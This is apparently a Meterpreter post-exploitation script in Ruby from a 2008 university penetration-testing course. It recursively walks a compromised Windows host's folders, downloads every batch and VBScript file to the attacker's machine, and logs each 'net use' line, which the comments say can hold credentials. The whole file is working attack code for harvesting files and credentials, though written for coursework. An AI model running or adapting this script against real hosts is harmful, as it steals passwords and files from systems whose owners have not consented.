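## Stephen Komal & Ronald Gutierrez
## CS 6573 - Penetration Testing & Vulnerability Analysis
## Date: November 20, 2008
#
# Walks a directory tree on the remote host, downloads every file whose name
# matches the 'files' filter, and records each line containing "net use"
# (case-insensitive) in a local results file.
#
# `args`, `client` and `print_line` are not defined in this file; presumably
# they are supplied by the Meterpreter scripting runtime -- confirm before
# running the script anywhere else.

# Arguments
# args[0]: remote directory where the search starts.
$basedir = args[0] || "C:\\Documents and Settings"
# args[1]: local file that receives the matching lines.
$output_file = args[1] || "/tmp/output_net_use.txt"

# Filters. Both patterns are regular-expression fragments and are matched
# case-insensitively against the full remote path.
filters = {
  # File names that get downloaded and searched.
  'files' => '\.(vb|vbs|com|cmd|bat)$',

  # Paths to skip. If opening a file or directory raises an access error,
  # add it here. Example: to skip System Volume Information and any file
  # called wakawaka.txt:
  #
  #   'exceptions' => '(System Volume Information|wakawaka.txt)'
  'exceptions' => '(System Volume Information)',

  # Kept from the original script; nothing in this file reads this entry.
  'free' => args[2]
}

# Recursively scans +path+ on the remote host.
#
# For each directory entry:
#   * entries matching $exceptions are reported and skipped;
#   * "." and ".." are skipped;
#   * directories are descended into;
#   * files matching $motif are downloaded to the local temp directory and
#     searched for "net use". Matching lines are appended to $output_file
#     and echoed; a local copy with no match is deleted again.
#
# path - remote directory (String), joined to entry names with a backslash.
#
# Errors raised by the remote file-system calls or by local file I/O are not
# rescued here and abort the scan.
def scan(path)
  client.fs.dir.foreach(path) do |entry|
    fullpath = path + '\\' + entry

    # Exceptions are checked first so excluded paths are never stat'ed.
    if fullpath =~ /#{$exceptions}/i
      print_line( "Skipping #{path}\\#{entry}" )
      next
    end

    next if entry =~ /^(\.|\.\.)$/

    if client.fs.file.stat(fullpath).directory?
      # Progress output, useful when debugging.
      print_line( "Working on #{fullpath}" )
      scan(fullpath)
    elsif fullpath =~ /#{$motif}/i
      # Flatten the remote path into a single local file name. The name is
      # data returned by the target, so it must not be able to steer where
      # the copy lands locally: ':', '|', ' ', '%' and '\' are replaced as
      # before, and '/' is replaced as well because it is a path separator
      # on the local side.
      flat_name = fullpath.tr_s(":| %/\\", "_")
      dst = ::Dir.tmpdir + ::File::Separator + flat_name

      print_line("Downloading '#{fullpath}' to '#{dst}'")
      client.fs.file.download_file(dst, fullpath)

      # Set once a "net use" line is seen; decides whether the copy is kept.
      found = false

      ::File.open(dst, "r") do |f|
        # Block form closes (and flushes) the results file after every
        # downloaded file; the previous code opened a new handle each time
        # and never closed it. Matched lines can carry credentials passed
        # to `net use`, so a newly created results file is owner-only.
        append_flags = ::File::WRONLY | ::File::APPEND | ::File::CREAT
        ::File.open($output_file, append_flags, 0600) do |out|
          f.grep( /net use/i ) do |line|
            found = true
            out.puts "#{dst}: #{line}\n"
            puts "#{dst}: #{line}\n"
          end
        end
      end

      # Copies without a match are removed. Copies with a match stay in the
      # local temp directory and may hold the same sensitive lines as the
      # results file.
      ::File.delete(dst) unless found
    end
  end
end

# scan() reads its patterns from these globals.
$motif = filters['files']
$exceptions = filters['exceptions']

print_line( "[*] Starting Scan on #{$basedir}" )

# Search, download and grep.
scan($basedir)

print_line( "[*] Scan finished.. Results logged to #{$output_file}" )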